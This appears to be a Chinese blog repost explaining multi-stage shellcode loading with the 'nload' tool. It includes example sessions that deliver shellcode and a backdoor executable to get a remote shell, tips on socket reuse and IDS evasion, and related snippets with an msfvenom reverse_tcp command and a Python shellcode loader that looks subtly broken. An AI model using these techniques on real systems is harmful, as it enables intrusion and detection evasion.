java 加载shellcode_多阶段加载shellcode

最新推荐文章于 2024-05-24 09:38:28 发布
最新推荐文章于 2024-05-24 09:38:28 发布
阅读量419 收藏
点赞数
文章标签: java 加载shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31759829/article/details/114713423
版权

介绍

多阶段加载是基于如下这种想法:如果一个小片段的shellcode可以在目标上执行,理论上可以通过网络连接、传输和执行其他的shellcode,或者甚至是一个完整的二进制可执行文件。

关键的想法是对加载的最终程序进行分级。这样子,只有严格大小的代码会在第一阶段加载。这种想法在一篇优秀的文章<>中有详细介绍。

第一阶段:shellcode加载

这是在加载链中至关重要的一步。代码必须够小,没有NULLs值并且必须能够在各种平台上执行。它的主要功能是找到用于连接的套接字描述符,并通过它读取额外的数据。

当完成时,加载器跳至数据部分并且CPU开始执行它

第二阶段:二进制加载

如果额外的shellcode可以取得预期的结果,那么第一阶段加载器可能是足够的。但也可能需要在目标机上运行更复杂的代码和譬如像C这种在各种环境中更能使用的高级语言。不幸的

是,通过C/C++/Java/其他语言不可能编写像汇编代码的大小的和效率。对这个问题的解决方案之一是使用通过第一阶段加载器执行的另一个加载器。第二阶段

加载器负责加载和执行实际可执行的二进制。这一切都发生在单一的TCP(或者UDP)会话中,这也是取得相关目标的好方法之一。它可以过滤几乎任何数据包。当然,可执行的payload和

加载shellcode的payload可能会陷入一些内容检查设备,但是这是另外一些情况了。

应当指出,在第一阶段加载二进制理论上没有问题的。但因为增加的payload的大小可能不切实际。这就是为什么选择这两个阶段的处理方法的原因。

POC: nload

nload是一个具有上述两种阶段能力的程序。这是一个C程序,负责协调加载的各个阶段。该软件包包括nload的源码和加载器使用的asm源码。它还包括一个演示服务端"srv.exe",这个程序仅仅是从TCP

socket读取代码并且执行它,其他的事情都不做。nload工作unix/win32环境下,但是加载器只对Windows NT/2000/XP有效。

不继续说了,我们开始一个会话的例子。这里我们有一台Linux主机,它的目标是一台IP地址为10.10.10.10的Windows主机。

$ ./nload 10.10.10.10 1111 -s example.s

nload v1.0 - load staged shellcode over network connection

Copyright (c) Jarkko Turkulainen 2004. All rights reserved.

Sending loader... 230 bytes sent

Sending shellcode... 204 bytes sent

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\>

在目标机器,运行着演示用的服务端"srv.exe",如下所示:

C:\>srv 1111

Oops.. I'm 0wned.

现在,这里发生如下过程:

1.在第一阶段,nload发送第一阶段加载器到目标主机并执行它(Sending loader... 222 bytes sent)

2.在第二季端,nload执行实际的shellcode(example.s)并执行它(Sending shellcode... 204 bytes sent)

在此之后,nload就在等待弹出shell(这是example.s做的事---执行cmd.exe和重定向IO到已经建立的TCP连接)

这个例子是非常简单的,因为服务端"srv.exe"并没有真正被利用。它需要是一个工作的shellcode和包含一对NOP指令的用于对齐的头部文件"head.s"。在一个真实的情况下

,它没有那么容易实现。还应该指出的是,example.s只有当宿主进程调用WSASocket winsock API调用打开socket下才能运行(这也是它在"srv.exe"下如何运行的原因)

另一个例子:

$ ./nload 10.10.10.10 1111 -b backdoor.exe exp_head.s exp_tail.s

nload v1.0 - load staged shellcode over network connection

Copyright (c) Jarkko Turkulainen 2004. All rights reserved.

Sending loader... 222 bytes sent

Sending 2nd loader... 328 bytes sent

Sending payload...

这个例子看起来有一些复杂:

"exp_head.s"和"exp_tail.s"代替"head.s"和"tail.s"用于第一阶段shellcode的对齐

在第一阶段中,nload发送第一阶段加载器到目标机并执行它(Sending loader... 222 bytes sent)

在第二阶段中,nload发送第二阶段加载器并执行它(Sending 2nd loader... 328 bytes sent)

第二阶段加载器读取可执行负载"backdoor.exe"并执行它

一些注意事项

在nload的当前实现中,scoket文件描述符通过比较当前的TCP连接的源端口进行搜索,这些源端口从getpeername()返回的每一个有效的文件描述符得到。此搜索可能会失败,如果客户端发起的连接在NAT设备后面。

为了更准确些,NAT设备可能会改变源端口和客户端的IP地址。大多数NAT的实现都是这样子,它被称为源NAT,PAT的,隐藏NAT,或其他。

因为原来的源端口在加载器的shellcode很难硬编码实现,因此正确的文件描述符很难发现。这种NAT问题的解决方案之一是实现一个的简单的协议。

这个协议大致是客户端发送一些认证数据到第一阶段加载器,加载器循环通过遍历所有文件描述符去试图找到数据。

如果成功的话,找到正确的描述,不管多少原有网络头部被改变。

另一个当前nload中恼人的限制是在二进制模式下可执行负载在执行前被保存在disk中。

nload试图删除二进制文件,但它仍然存在。

更新:nload2不会在磁盘上保存二进制,它在内存中执行它!

在第2阶段,nload执行一个可执行的二进制文件(.exe),这显然有一定的局限性(nload2仍然需要读取访问主机应用程序,主机应用程序是可见的,等等)。

还有另一种非常复杂的可执行文件加载的方法,被称为 Library Injection,这是更加灵活和隐身。

下载nload

链接

Metasploit http://www.metasploit.com/

Remote Library Injection http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf

MOSDEF http://www.immunitysec.com/

LSD's wasm http://lsd-pl.net/projects.html#windowsassembly

InlineEgg http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html

Impurity 1.0 http://archives.neohapsis.com/archives/vuln-dev/2003-q4/0006.html

Understanding Windows Shellcode http://www.hick.org/code/skape/papers/win32-shellcode.pdf

备注:

复用当前的socket

1.IIS的ECB结构

2.getpeername

3.fcntl设置socket状态

4.ioctl(Linux/Unix)和ioctlsocket(Win32)

5.使用OOB特性

6.Hook系统的recv调用

复用当前连接的技术相对较隐蔽,而且对于Win32的用管道绑定cmd.exe后,和服务器交互的数据可以用xor的办法进行编码,进一步躲避IDS的检测

单单查找SOCKET的shellcode可以写的相对比较短,在找到socket后,可以再继续接收一段功能更复杂的shellcode到缓冲区,然后跳入执行。对于该后续shellcode就没有任何字

符和长度的限制。甚至接收一个dll文件,实现更复杂的功能。

摘自xcon2004-san

getsockname和getpeername在有NAT网络环境里是会出现查找socket失败的

参考链接:

http://seclists.org/dailydave/2004/q3/48

http://www.klake.org/~jt/asmcode/

http://www.klake.org/~jt/mstage/

http://hi.baidu.com/yuange1975/blog/item/618800542ebc730e3a293508.html

http://www.hick.org/code/skape/shellcode/win32/

http://hi.baidu.com/erenfei/blog/item/0a9298f389559ac80b46e024.html

通人情
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java shellcode_通用Shellcode
weixin_35780426的博客
02-26 935
Shellcode器是一种基本的规避技术。尽管shellcode器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
java shellcode_MSF-Shellcode生成和使用
weixin_29348211的博客
02-26 596
1使用环境Kali 2.0msfvenom2Msfvenom参数说明msfvenom –h 查看帮助说明:Options:-p, --payload 指定需要使用的payload(***荷)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: ...
java shellcode_各种语言实现Shellcode(暂时两种)
weixin_39660931的博客
02-26 534
原理:使用Shellcode器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现ShellcodeShellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
推荐开源项目:Java ShellCode Loader
最新发布
gitblog_00075的博客
05-24 308
推荐开源项目:Java ShellCode Loader 项目地址:https://gitcode.com/yzddmr6/Java-Shellcode-Loader 在信息安全和软件测试领域,ShellCode扮演着重要的角色。它是一小段机器码,可以直接执行,无需任何可执行文件包裹。而Java ShellCode Loader正是一个精心设计的工具,它允许你在Java环境中方便地并执行She...
java shellcode_WIN下获取kernel基址的shellcode探讨(ZT)
weixin_34543510的博客
02-26 323
WIN下获取kernel基址的shellcode探讨gz1X[gz1x(at)tom(dot)com]2006.6.30[什么是shellcode]———————————Shellcode是一个攻击程序(Exploit)的核心代码,能够在溢出后改变系统的正常流程,取得系统的控制权,是一些汇编代码抽取成的16进制码;[经典溢出攻击流程]———————————1.查找Kernel32.dll基地址;2...
CDL_shellcode_源码
10-02
在本案例中,"CDL_shellcode_源码" 提供的是一种JavaScript实现的ShellcodeJavaScript Shellcode虽然不如传统操作系统(如Windows、Linux)中的Shellcode常见,但在某些场景下,如浏览器环境或Node.js环境中,它...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
标题"此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell"表明包含的源代码是专门设计用来在Linux x86系统上生成shellcode的。"rar"文件可能是源代码的压缩包,而"shellcode_shell"可能指的是该...
基于Java实现的Shellcode器源码+项目说明.zip
12-29
基于Java实现的Shellcode器源码+项目说明.zip基于Java实现的Shellcode器源码+项目说明.zip基于Java实现的Shellcode器源码+项目说明.zip基于Java实现的Shellcode器源码+项目说明.zip
The Shellcoder's Handbook_sentencekhp_shellcode_
09-29
Shellcoder's Handbook》是一本深受安全研究者和程序员喜爱的经典书籍,主要关注的是shellcode的编写和利用。shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞来执行任意命令或者获得目标...
shellcode
10-02
Shellcode器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种器的设计旨在绕过安全机制,...
java安卓辅助源码-injection-stuff:PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、
06-04
java安卓辅助源码 Injection PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、Dylib注入,当前包括400+工具和350+文章,根据功能进行了粗糙的分类 目录 -> -> -> -> -> -> -> -> -> PE注入 工具 [535星][20d] [C] peinjector - MITM PE file infector [407星][5m] [Assembly] 将PE文件转换为Shellcode [230星][3y] [C++] Inject custom code into PE file [This project is not maintained anymore] [220星][2y] [C++] C++ application that uses memory and code hooks to detect packers [196星][30d] [Py] Search for code cave in all binaries [126星][3y] [C++] 将ROP编码的shellcode打补丁到PE文
shellload:将shellcode到新进程中,可以选择使用假名称
05-17
shellcode到新进程中,可以选择将其隐藏在错误的进程名称下。 用法 简单的用法是将您的shellcode(十六进制编码)通过管道传输到stdin。 这将在当前的shellload进程中运行shellcode。 (提供的示例shellcode将运行touch itworks命令) $ printf "6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80e000000746f756368206974776f726b730056574889e60f05" | ./shellload64 中间用法是将shellcode作为参数传递。 这会产生一个运行shellcode的后台进程。 $ ./shellload64 6a3b589948bb2f62696e2f736800534889e7682d630000488
java shellcode_动态 ShellCode绕过杀软
weixin_32529429的博客
02-26 522
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下并将代码到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virsca...
shellcode分段执行
Xor0ne
03-04 1168
刚有点思路,所以就试着边理清思路边写代码吧! 我是将一个弹出messagebox的代码为例子,制成shellcode。 然后再分成三段分别根据不同的xor进行密,然后在边解密边执行。 我的计划是最后执行的时候只有两部分代码,一个是内嵌汇编 _asm{}执行语句,一个是encode[]边解密边执行的语句。 首先,内嵌汇编如下: _asm { lea eax,encode add eax, 10...
java shellcode_ShellCode的编写入门
weixin_39630140的博客
02-26 270
因此WinExec真正的地址是7C8623AD,注意,这里是要反过来读取。三、现在有了汇编模样的语句和WinExec的地址,接下来就是要转化为具有Shellcode的汇编代码。在转化汇编时先了解汇编下面是如何完成一个函数调用的:1、父函数将函数的实参按照从右至左顺序压入堆栈;2、CPU将父函数中函数调用指令Call XXXXXXXX的下一条指令地址EIP压入堆栈;3、父函数通过Push Ebp将基...
Java内存的利用技巧——通过jspShellcode
m0_69860228的博客
05-06 709
0x00 前言 本文基于rebeyond的《Java内存攻击技术漫谈》,以Tomcat环境为例,介绍通过jspShellcode的方法,开源代码,记录细节。 0x01 简介 本文将要介绍以下内容: 依赖tools.jarShellcode 自定义类Shellcode 0x02 依赖tools.jarShellcode 1.Java实现 通过enqueue函数Shellcode,测试代码: import java.lang.reflect.Method; public
Java 执行 Shell 工具方法
Xiang想
03-06 585
Java 执行 shell 工具方法
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 1020
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
用python制作shellcode
08-08
### 回答1: 制作 Shellcode 器的方法有很多,这里介绍一种基于 Python 的实现方法。 首先,我们需要编写一个能够执行 shellcode 的程序。这个程序可以使用 C 语言编写,也可以使用其他语言编写。下面是一个简单的 C 语言程序,它会执行传入的 shellcode: ```c #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char *shellcode = argv[1]; ((void (*)(void))shellcode)(); return 0; } ``` 编译这个程序: ``` gcc -o shellcode_loader shellcode_loader.c ``` 现在,我们可以使用 Python 来编写一个能够 shellcode 的脚本。这个脚本的基本思路是: 1. 将 shellcode 写入内存。 2. 调用 shellcode。 下面是 Python 代码: ```python import ctypes # shellcode shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # 将 shellcode 写入内存 memory = ctypes.create_string_buffer(shellcode) shellcode_address = ctypes.addressof(memory) # 调用 shellcode func = ctypes.CFUNCTYPE(None) func(shellcode_address) ``` 这个脚本使用 ctypes 库来实现将 shellcode 写入内存和调用 shellcode。首先,我们使用 create_string_buffer() 函数创建一个内存缓冲区,并将 shellcode 写入这个缓冲区。然后,我们使用 addressof() 函数获取缓冲区的内存地址,并将这个地址存储在 shellcode_address 变量中。最后,我们定义一个 CFUNCTYPE 类型的变量 func,并将其初始化为 None。CFUNCTYPE 类型表示一个 C 函数指针类型,它可以用来调用 C 函数。然后,我们可以通过 func(shellcode_address) 调用 shellcode。 需要注意的是,这个脚本必须以管理员权限运行,否则无法将 shellcode 写入内存。 以上就是基于 Python 的 shellcode 器的实现方法。 ### 回答2: Python是一种高级编程语言,可用于编写各种各样的脚本和程序。当使用Python编写shellcode器时,需要了解以下几个关键概念和步骤。 首先,要理解shellcode是什么。Shellcode是一种计算机程序,通常用于利用漏洞或执行特定的操作。Shellcode通常是二进制代码,用于在目标系统上执行指定的操作。 接下来,我们需要了解器是如何工作的。器是一段代码,其目的是将shellcode注入到目标进程中,并执行它。器通常是以DLL文件的形式存在,然后通过各种技术将其注入到目标进程中。 在Python中,可以使用ctypes库来DLL并执行其中的函数。ctypes提供了一种在Python中调用动态链接库函数的简单方法。 下面是一个简单的示例程序,用Python编写的shellcode器: ``` import ctypes # DLL shellcode_dll = ctypes.WinDLL("shellcode.dll") # 器函数 def shellcode_loader(shellcode): # 将shellcode注入到目标进程中 shellcode_dll.LoadShellcode(shellcode) # 调用器函数 shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31" shellcode_loader(shellcode) ``` 在上面的示例中,我们首先使用ctypes库了一个名为shellcode_dll的DLL文件。然后定义了一个名为shellcode_loader的函数,该函数将接受一个shellcode作为参数,并调用shellcode_dll中的LoadShellcode函数来执行注入操作。最后,我们创建了一个包含实际shellcode的字符串,并将其传递给shellcode_loader函数进行。 需要注意的是,为了编写一个完整的shellcode器,可能还需要进一步的处理和代码,以适应不同的操作系统和处理器架构。此外,也需要适当的授权和合法用途来使用此代码。 ### 回答3: Python是一种高级编程语言,它的灵活性使得它成为编写器的理想工具。一个器的目的是将shellcode从内存中到计算机的进程空间,以便运行恶意代码。 使用Python编写一个shellcode器的过程如下: 1. 导入所需的模块:首先,在代码的开头,我们需要导入所需的模块。对于shellcode器,我们需要使用`ctypes`模块来与C语言进行交互。该模块能够动态链接库(DLL)和执行其中的函数。 2. 定义shellcode:在代码的下一部分,我们需要定义要shellcode。这可以是由其他工具生成的二进制代码,也可以是手动编写的shellcode。将shellcode保存在一个字符串变量中。 3. 创建内存空间:我们需要为shellcode分配一块内存空间,以便它能够在其中运行。使用`ctypes`模块的`create_string_buffer`函数来创建这块内存空间。通过设置空间的大小来确保能够容纳整个shellcode。 4. 将shellcode复制到内存中:使用Python的`ctypes`库的`memcpy`函数将shellcode复制到之前分配的内存空间中。 5. 将内存设置为可执行:为了使操作系统将这块内存视为可执行代码,我们需要在内存空间上设置相应的标志。使用`ctypes`库的`VirtualProtect`函数可以实现这一点。 6. 执行shellcode:最后,我们需要通过函数指针调用shellcode的入口点,以便开始执行恶意代码。使用`ctypes`库的`CFUNCTYPE`函数创建一个C函数指针,然后使用这个指针来调用shellcode。 编写完成后,可以将代码保存为一个Python脚本,并在命令行中运行它。此时,shellcode将被到内存中,并开始执行。 需要注意的是,编写和使用shellcode器涉及到一些复杂的概念,如内存管理和计算机安全。在实践中,请确保对代码的运行环境和目标平台有透彻的理解,并遵循适当的法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值